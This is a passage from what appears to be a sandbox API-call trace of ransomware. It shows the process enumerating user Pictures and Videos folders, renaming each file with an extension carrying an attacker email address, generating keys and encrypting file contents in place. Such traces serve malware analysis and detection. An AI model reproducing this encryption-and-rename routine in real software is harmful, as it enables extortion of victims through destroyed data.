HALPmcxz\\Pictures\\T8HaqB\\lHklJjXmqiQDclKJYe\\VQUbALduVG4rakEX.bmp", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\lHklJjXmqiQDclKJYe\\VQUbALduVG4rakEX.bmp.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\lHklJjXmqiQDclKJYe\\VQUbALduVG4rakEX.bmp.12781717671972518758.ex_parvis@aol.com.AIR" [0173.257] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\lHklJjXmqiQDclKJYe\\VQUbALduVG4rakEX.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\t8haqb\\lhkljjxmqiqdclkjye\\vqubalduvg4rakex.bmp"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\lHklJjXmqiQDclKJYe\\VQUbALduVG4rakEX.bmp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\t8haqb\\lhkljjxmqiqdclkjye\\vqubalduvg4rakex.bmp.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0173.265] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\lHklJjXmqiQDclKJYe\\VQUbALduVG4rakEX.bmp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\t8haqb\\lhkljjxmqiqdclkjye\\vqubalduvg4rakex.bmp.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x638 [0173.265] GetProcessHeap () returned 0x2e0000 [0173.265] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x32f868 | out: hHeap=0x2e0000) returned 1 [0173.265] GetFileSizeEx (in: hFile=0x638, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=91991) returned 1 [0173.265] SetFilePointer (in: hFile=0x638, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x16757 [0173.265] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0173.265] GetProcessHeap () returned 0x2e0000 [0173.265] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0173.265] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0173.265] WriteFile (in: hFile=0x638, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0173.266] WriteFile (in: hFile=0x638, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0173.266] WriteFile (in: hFile=0x638, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0173.266] ReadFile (in: hFile=0x638, lpBuffer=0x3110048, nNumberOfBytesToRead=0x16757, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3110048*, lpNumberOfBytesRead=0x2acf9c8*=0x16757, lpOverlapped=0x0) returned 1 [0173.270] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0173.270] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0173.270] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\lHklJjXmqiQDclKJYe\\npAZ14MLdVJ2rMCWJ.gif", dwFileAttributes=0x80) returned 1 [0173.270] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\lHklJjXmqiQDclKJYe\\npAZ14MLdVJ2rMCWJ.gif") returned 87 [0173.270] GetProcessHeap () returned 0x2e0000 [0173.270] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x114) returned 0x32f868 [0173.270] lstrcpyW (in: lpString1=0x32f868, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\lHklJjXmqiQDclKJYe\\npAZ14MLdVJ2rMCWJ.gif" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\lHklJjXmqiQDclKJYe\\npAZ14MLdVJ2rMCWJ.gif") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\lHklJjXmqiQDclKJYe\\npAZ14MLdVJ2rMCWJ.gif" [0173.270] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\lHklJjXmqiQDclKJYe\\npAZ14MLdVJ2rMCWJ.gif", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\lHklJjXmqiQDclKJYe\\npAZ14MLdVJ2rMCWJ.gif.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\lHklJjXmqiQDclKJYe\\npAZ14MLdVJ2rMCWJ.gif.12781717671972518758.ex_parvis@aol.com.AIR" [0173.271] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\lHklJjXmqiQDclKJYe\\npAZ14MLdVJ2rMCWJ.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\t8haqb\\lhkljjxmqiqdclkjye\\npaz14mldvj2rmcwj.gif"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\lHklJjXmqiQDclKJYe\\npAZ14MLdVJ2rMCWJ.gif.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\t8haqb\\lhkljjxmqiqdclkjye\\npaz14mldvj2rmcwj.gif.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0173.274] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\lHklJjXmqiQDclKJYe\\npAZ14MLdVJ2rMCWJ.gif.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\t8haqb\\lhkljjxmqiqdclkjye\\npaz14mldvj2rmcwj.gif.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x638 [0173.274] GetProcessHeap () returned 0x2e0000 [0173.274] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x32f868 | out: hHeap=0x2e0000) returned 1 [0173.274] GetFileSizeEx (in: hFile=0x638, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=41155) returned 1 [0173.274] SetFilePointer (in: hFile=0x638, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xa0c3 [0173.274] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0173.274] GetProcessHeap () returned 0x2e0000 [0173.274] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0173.274] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0173.274] WriteFile (in: hFile=0x638, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0173.275] WriteFile (in: hFile=0x638, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0173.275] WriteFile (in: hFile=0x638, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0173.275] ReadFile (in: hFile=0x638, lpBuffer=0x3110048, nNumberOfBytesToRead=0xa0c3, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3110048*, lpNumberOfBytesRead=0x2acf9c8*=0xa0c3, lpOverlapped=0x0) returned 1 [0173.278] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0173.278] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0173.278] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\lHklJjXmqiQDclKJYe\\kqOAXh99lxpDm7Xhj.bmp", dwFileAttributes=0x80) returned 1 [0173.279] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\lHklJjXmqiQDclKJYe\\kqOAXh99lxpDm7Xhj.bmp") returned 87 [0173.279] GetProcessHeap () returned 0x2e0000 [0173.279] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x114) returned 0x32f868 [0173.279] lstrcpyW (in: lpString1=0x32f868, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\lHklJjXmqiQDclKJYe\\kqOAXh99lxpDm7Xhj.bmp" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\lHklJjXmqiQDclKJYe\\kqOAXh99lxpDm7Xhj.bmp") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\lHklJjXmqiQDclKJYe\\kqOAXh99lxpDm7Xhj.bmp" [0173.279] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\lHklJjXmqiQDclKJYe\\kqOAXh99lxpDm7Xhj.bmp", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\lHklJjXmqiQDclKJYe\\kqOAXh99lxpDm7Xhj.bmp.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\lHklJjXmqiQDclKJYe\\kqOAXh99lxpDm7Xhj.bmp.12781717671972518758.ex_parvis@aol.com.AIR" [0173.279] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\lHklJjXmqiQDclKJYe\\kqOAXh99lxpDm7Xhj.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\t8haqb\\lhkljjxmqiqdclkjye\\kqoaxh99lxpdm7xhj.bmp"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\lHklJjXmqiQDclKJYe\\kqOAXh99lxpDm7Xhj.bmp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\t8haqb\\lhkljjxmqiqdclkjye\\kqoaxh99lxpdm7xhj.bmp.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0173.284] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\lHklJjXmqiQDclKJYe\\kqOAXh99lxpDm7Xhj.bmp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\t8haqb\\lhkljjxmqiqdclkjye\\kqoaxh99lxpdm7xhj.bmp.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x638 [0173.284] GetProcessHeap () returned 0x2e0000 [0173.284] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x32f868 | out: hHeap=0x2e0000) returned 1 [0173.284] GetFileSizeEx (in: hFile=0x638, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=4277) returned 1 [0173.284] SetFilePointer (in: hFile=0x638, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x10b5 [0173.284] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0173.284] GetProcessHeap () returned 0x2e0000 [0173.284] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0173.284] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0173.284] WriteFile (in: hFile=0x638, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0173.285] WriteFile (in: hFile=0x638, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0173.285] WriteFile (in: hFile=0x638, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0173.286] ReadFile (in: hFile=0x638, lpBuffer=0x3d6410, nNumberOfBytesToRead=0x10b5, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3d6410*, lpNumberOfBytesRead=0x2acf9c8*=0x10b5, lpOverlapped=0x0) returned 1 [0173.286] SetFilePointer (in: hFile=0x638, lDistanceToMove=-4277, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.286] WriteFile (in: hFile=0x638, lpBuffer=0x3d74d0*, nNumberOfBytesToWrite=0x10b5, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3d74d0*, lpNumberOfBytesWritten=0x2acf9c8*=0x10b5, lpOverlapped=0x0) returned 1 [0173.287] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0173.287] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0173.287] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\lHklJjXmqiQDclKJYe\\Isx8zfZv9X0X.bmp", dwFileAttributes=0x80) returned 1 [0173.288] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\lHklJjXmqiQDclKJYe\\Isx8zfZv9X0X.bmp") returned 82 [0173.288] GetProcessHeap () returned 0x2e0000 [0173.288] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10a) returned 0x32f868 [0173.288] lstrcpyW (in: lpString1=0x32f868, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\lHklJjXmqiQDclKJYe\\Isx8zfZv9X0X.bmp" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\lHklJjXmqiQDclKJYe\\Isx8zfZv9X0X.bmp") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\lHklJjXmqiQDclKJYe\\Isx8zfZv9X0X.bmp" [0173.288] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\lHklJjXmqiQDclKJYe\\Isx8zfZv9X0X.bmp", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\lHklJjXmqiQDclKJYe\\Isx8zfZv9X0X.bmp.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\lHklJjXmqiQDclKJYe\\Isx8zfZv9X0X.bmp.12781717671972518758.ex_parvis@aol.com.AIR" [0173.288] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\lHklJjXmqiQDclKJYe\\Isx8zfZv9X0X.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\t8haqb\\lhkljjxmqiqdclkjye\\isx8zfzv9x0x.bmp"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\lHklJjXmqiQDclKJYe\\Isx8zfZv9X0X.bmp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\t8haqb\\lhkljjxmqiqdclkjye\\isx8zfzv9x0x.bmp.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0173.291] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\lHklJjXmqiQDclKJYe\\Isx8zfZv9X0X.bmp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\t8haqb\\lhkljjxmqiqdclkjye\\isx8zfzv9x0x.bmp.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x638 [0173.291] GetProcessHeap () returned 0x2e0000 [0173.291] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x32f868 | out: hHeap=0x2e0000) returned 1 [0173.291] GetFileSizeEx (in: hFile=0x638, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=25620) returned 1 [0173.291] SetFilePointer (in: hFile=0x638, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x6414 [0173.291] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0173.291] GetProcessHeap () returned 0x2e0000 [0173.292] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0173.292] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0173.292] WriteFile (in: hFile=0x638, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0173.293] WriteFile (in: hFile=0x638, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0173.293] WriteFile (in: hFile=0x638, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0173.294] ReadFile (in: hFile=0x638, lpBuffer=0x3d6410, nNumberOfBytesToRead=0x6414, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3d6410*, lpNumberOfBytesRead=0x2acf9c8*=0x6414, lpOverlapped=0x0) returned 1 [0173.294] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\daw6GeC\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd3f6b00, ftCreationTime.dwHighDateTime=0x1d4ccf9, ftLastAccessTime.dwLowDateTime=0xb5495990, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb5495990, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x384570 [0173.295] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0173.295] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0173.295] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\daw6GeC\\Royj5OKqT_.swf", dwFileAttributes=0x80) returned 1 [0173.295] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\daw6GeC\\Royj5OKqT_.swf") returned 71 [0173.295] GetProcessHeap () returned 0x2e0000 [0173.295] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xf4) returned 0x31f5f0 [0173.295] lstrcpyW (in: lpString1=0x31f5f0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\daw6GeC\\Royj5OKqT_.swf" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\daw6GeC\\Royj5OKqT_.swf") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\daw6GeC\\Royj5OKqT_.swf" [0173.295] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\daw6GeC\\Royj5OKqT_.swf", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\daw6GeC\\Royj5OKqT_.swf.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\daw6GeC\\Royj5OKqT_.swf.12781717671972518758.ex_parvis@aol.com.AIR" [0173.296] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\daw6GeC\\Royj5OKqT_.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\b 7s0g0p 7\\daw6gec\\royj5okqt_.swf"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\daw6GeC\\Royj5OKqT_.swf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\b 7s0g0p 7\\daw6gec\\royj5okqt_.swf.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0173.298] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\daw6GeC\\Royj5OKqT_.swf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\b 7s0g0p 7\\daw6gec\\royj5okqt_.swf.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0173.298] GetProcessHeap () returned 0x2e0000 [0173.298] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31f5f0 | out: hHeap=0x2e0000) returned 1 [0173.298] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=48985) returned 1 [0173.298] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xbf59 [0173.298] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0173.298] GetProcessHeap () returned 0x2e0000 [0173.298] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0173.298] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0173.298] WriteFile (in: hFile=0x63c, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0173.300] WriteFile (in: hFile=0x63c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0173.300] WriteFile (in: hFile=0x63c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0173.300] ReadFile (in: hFile=0x63c, lpBuffer=0x3110048, nNumberOfBytesToRead=0xbf59, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3110048*, lpNumberOfBytesRead=0x2acf9c8*=0xbf59, lpOverlapped=0x0) returned 1 [0173.303] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\iLdqVio\\*", lpFindFileData=0x2acfb30 | out: 